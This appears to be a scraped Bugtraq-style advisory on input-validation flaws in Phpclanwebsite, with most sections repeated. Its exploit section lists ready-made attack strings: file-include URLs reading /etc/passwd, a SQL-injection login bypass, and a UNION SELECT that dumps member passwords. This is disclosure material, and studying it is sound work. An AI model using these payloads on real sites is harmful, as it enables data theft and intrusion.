Phpclanwebsite Multiple Input Validation Vulnerabilities
BID:32915
Info
Phpclanwebsite Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 32915 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5878 CVE-2008-5877 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 18 2008 12:00AM |
| Updated: | Jul 06 2016 02:18PM |
| Credit: | s4avrd0w |
| Vulnerable: |
Phpclanwebsite Phpclanwebsite 1.3.23 Fix Pack #5 |
| Not Vulnerable: | |
Discussion
Phpclanwebsite Multiple Input Validation Vulnerabilities
Phpclanwebsite is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple local file-include, SQL-injection, and cross-site-scripting issues.
Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Phpclanwebsite 1.23.3 Fix Pack #5 is vulnerable; other versions may also be affected.
Phpclanwebsite is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple local file-include, SQL-injection, and cross-site-scripting issues.
Exploiting these issues can allow an attacker to steal cookie-based authentication credentials, view local files within the context of the webserver, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.
Phpclanwebsite 1.23.3 Fix Pack #5 is vulnerable; other versions may also be affected.
Exploit / POC
Phpclanwebsite Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user into visiting a malicious URI.
The following exploit URIs are available:
Local file-include:
http://www.example.com/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00
http://www.example.com/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00
SQL-injection:
http://www.example.com//index.php?page=processforms&ok=1&SP=1&form_id=2
http://www.example.com/index.php?page=login
POST:pcwlogin=1'+OR+11--&pcw_pass=1
http://www.example.com/index.php?page=downloads&func=search
POST:searchvalue='SQL&whichfield=SQL
POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members--
A cross-site scripting example is also available:
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice an unsuspecting user into visiting a malicious URI.
The following exploit URIs are available:
Local file-include:
http://www.example.com/theme/superchrome/box.php?boxname=../../../../../etc/passwd%00
http://www.example.com/phpclanwebsite/footer.php?theme=../../../../../etc/passwd%00
SQL-injection:
http://www.example.com//index.php?page=processforms&ok=1&SP=1&form_id=2
http://www.example.com/index.php?page=login
POST:pcwlogin=1'+OR+11--&pcw_pass=1
http://www.example.com/index.php?page=downloads&func=search
POST:searchvalue='SQL&whichfield=SQL
POST:searchvalue=1&whichfield=dl_name>1)+limit+0+union+select+tag,2,3,login,5,6,7,email,9,password,11,12,13,14,15+from+cws_members--
A cross-site scripting example is also available:
Solution / Fix
Phpclanwebsite Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Phpclanwebsite Multiple Input Validation Vulnerabilities
References:
References:
- Phpclanwebsite Web Site (Phpclanwebsite)